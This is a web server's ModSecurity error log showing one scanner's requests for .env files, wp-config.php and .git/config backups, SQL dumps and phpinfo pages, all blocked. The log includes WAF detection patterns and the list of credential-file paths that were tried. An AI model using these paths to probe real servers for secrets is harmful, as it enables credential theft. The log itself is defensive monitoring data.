[Tue May 26 15:32:32.076026 2026] [security2:error] [pid 724639:tid 724760] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/var/www/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qZQAAong"]
[Tue May 26 15:32:32.082824 2026] [security2:error] [pid 724639:tid 724640] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/var/www/html/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qZgAApAA"]
[Tue May 26 15:32:32.152997 2026] [security2:error] [pid 724639:tid 724756] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/web/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qagAAw3Q"]
[Tue May 26 15:32:32.230217 2026] [security2:error] [pid 724639:tid 724651] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/website/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qewAAxgs"]
[Tue May 26 15:32:32.284479 2026] [security2:error] [pid 724639:tid 724653] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php"] [unique_id "ahVvuBKJRbiNp3eWdT1qgwAAyw0"]
[Tue May 26 15:32:32.298157 2026] [security2:error] [pid 724639:tid 724649] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.bak"] [unique_id "ahVvuBKJRbiNp3eWdT1qhAAAqgk"]
[Tue May 26 15:32:32.322928 2026] [security2:error] [pid 724639:tid 724654] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.new"] [unique_id "ahVvuBKJRbiNp3eWdT1qiAAArg4"]
[Tue May 26 15:32:32.334467 2026] [security2:error] [pid 724639:tid 724656] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-config.php.old"] [unique_id "ahVvuBKJRbiNp3eWdT1qiQAA9hA"]
[Tue May 26 15:32:32.353814 2026] [security2:error] [pid 724639:tid 724658] [remote 195.178.110.199:46950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVvuBKJRbiNp3eWdT1qigAA2RI"]
[Tue May 26 15:32:32.626375 2026] [security2:error] [pid 724639:tid 724789] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvuBKJRbiNp3eWdT1qeQAAAJk"]
[Tue May 26 15:32:32.635068 2026] [security2:error] [pid 724639:tid 724785] [client 195.178.110.199:50400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.stvica.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVvuBKJRbiNp3eWdT1qmgAAAJU"]
[Tue May 26 15:32:32.787418 2026] [autoindex:error] [pid 724639:tid 724881] [client 195.178.110.199:50396] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:32.807073 2026] [security2:error] [pid 724639:tid 724813] [client 195.178.110.199:50408] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qpQAAALE"]
[Tue May 26 15:32:32.862531 2026] [security2:error] [pid 724639:tid 724847] [client 195.178.110.199:50418] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qqAAAANM"]
[Tue May 26 15:32:32.989053 2026] [security2:error] [pid 724639:tid 724842] [client 195.178.110.199:50474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVvuBKJRbiNp3eWdT1qsgAAAM4"]
[Tue May 26 15:32:33.736278 2026] [security2:error] [pid 724639:tid 724830] [client 195.178.110.199:50372] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahVvuRKJRbiNp3eWdT1qwwAAAMI"]
[Tue May 26 15:32:34.577499 2026] [security2:error] [pid 724639:tid 724868] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVvuhKJRbiNp3eWdT1q5gAAAOg"]
[Tue May 26 15:32:34.648015 2026] [security2:error] [pid 724639:tid 724866] [client 195.178.110.199:50422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVvuhKJRbiNp3eWdT1q6AAAAOY"]
[Tue May 26 15:32:35.362584 2026] [security2:error] [pid 724639:tid 724811] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env"] [unique_id "ahVvuxKJRbiNp3eWdT1rEAAAAK8"]
[Tue May 26 15:32:35.454520 2026] [security2:error] [pid 724639:tid 724810] [client 195.178.110.199:50416] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.php"] [unique_id "ahVvuxKJRbiNp3eWdT1rFQAAAK4"]
[Tue May 26 15:32:35.716148 2026] [security2:error] [pid 724639:tid 724775] [client 195.178.110.199:50422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.old"] [unique_id "ahVvuxKJRbiNp3eWdT1rIgAAAIs"]
[Tue May 26 15:32:35.727754 2026] [security2:error] [pid 724639:tid 724832] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvuxKJRbiNp3eWdT1rDAAAAMQ"]
[Tue May 26 15:32:35.938611 2026] [security2:error] [pid 724639:tid 724884] [client 195.178.110.199:50444] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env.swp"] [unique_id "ahVvuxKJRbiNp3eWdT1rMgAAAPg"]
[Tue May 26 15:32:36.061962 2026] [security2:error] [pid 724639:tid 724889] [client 195.178.110.199:50508] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.env~"] [unique_id "ahVvvBKJRbiNp3eWdT1rPAAAAP0"]
[Tue May 26 15:32:36.171251 2026] [security2:error] [pid 724639:tid 724828] [client 185.100.87.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahVvuxKJRbiNp3eWdT1rCQAAAMA"]
[Tue May 26 15:32:36.176336 2026] [security2:error] [pid 724639:tid 724792] [client 195.178.110.199:50484] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config.bak"] [unique_id "ahVvvBKJRbiNp3eWdT1rQAAAAJw"]
[Tue May 26 15:32:36.185776 2026] [security2:error] [pid 724639:tid 724833] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config.old"] [unique_id "ahVvvBKJRbiNp3eWdT1rQwAAAMU"]
[Tue May 26 15:32:36.269351 2026] [security2:error] [pid 724639:tid 724871] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/.git/config~"] [unique_id "ahVvvBKJRbiNp3eWdT1rRgAAAOs"]
[Tue May 26 15:32:37.941298 2026] [security2:error] [pid 724639:tid 724889] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVvvRKJRbiNp3eWdT1riAAAAP0"]
[Tue May 26 15:32:37.969271 2026] [security2:error] [pid 724639:tid 724769] [client 195.178.110.199:50508] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVvvRKJRbiNp3eWdT1rowAAAIU"]
[Tue May 26 15:32:38.094879 2026] [autoindex:error] [pid 724639:tid 724831] [client 195.178.110.199:50438] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:38.117415 2026] [security2:error] [pid 724639:tid 724894] [client 195.178.110.199:50458] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/ADMIN/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1rrgAAAQI"]
[Tue May 26 15:32:38.128926 2026] [autoindex:error] [pid 724639:tid 724845] [client 195.178.110.199:50414] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:38.384012 2026] [security2:error] [pid 724639:tid 724869] [client 195.178.110.199:50460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/APP/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1ruAAAAOk"]
[Tue May 26 15:32:38.401333 2026] [autoindex:error] [pid 724639:tid 724838] [client 195.178.110.199:50422] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:32:38.413763 2026] [security2:error] [pid 724639:tid 724840] [client 195.178.110.199:50474] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BACKEND/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1ruQAAAMw"]
[Tue May 26 15:32:38.488820 2026] [security2:error] [pid 724639:tid 724812] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/API/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1rwAAAALA"]
[Tue May 26 15:32:38.531870 2026] [security2:error] [pid 724639:tid 724824] [client 195.178.110.199:50460] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BE/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1rxQAAALw"]
[Tue May 26 15:32:38.641756 2026] [security2:error] [pid 724639:tid 724846] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Be/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1rzgAAANI"]
[Tue May 26 15:32:38.718679 2026] [security2:error] [pid 724639:tid 724793] [client 195.178.110.199:50438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Api/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1rzwAAAJ0"]
[Tue May 26 15:32:38.736273 2026] [security2:error] [pid 724639:tid 724796] [client 195.178.110.199:50400] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/BACK/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1r1AAAAKA"]
[Tue May 26 15:32:38.951285 2026] [security2:error] [pid 724639:tid 724798] [client 195.178.110.199:50380] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/Backend/.env"] [unique_id "ahVvvhKJRbiNp3eWdT1r3AAAAKI"]
[Tue May 26 15:32:39.288787 2026] [security2:error] [pid 724639:tid 724809] [client 195.178.110.199:50494] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVvvxKJRbiNp3eWdT1r8QAAAK0"]
[Tue May 26 15:32:39.745387 2026] [security2:error] [pid 724639:tid 724786] [client 195.178.110.199:50396] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.stvica.jhonweb.com"] [uri "/admin-app/.env"] [unique_id "ahVvvxKJRbiNp3eWdT1sCwAAAJY"]
[Tue May 26 15:32:39.899959 2026] [security2:error] [pid 724639:tid 724812] [client 195.178.110.199:50444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVvvxKJRbiNp3eWdT1sEwAAALA"]
[Tue May 26 15:32:40.026422 2026] [security2:error] [pid 724639:tid 724834] [client 195.178.110.199:50422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.stvica.jhonweb.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVvwBKJRbiNp3eWdT1sGQAAAMY"]
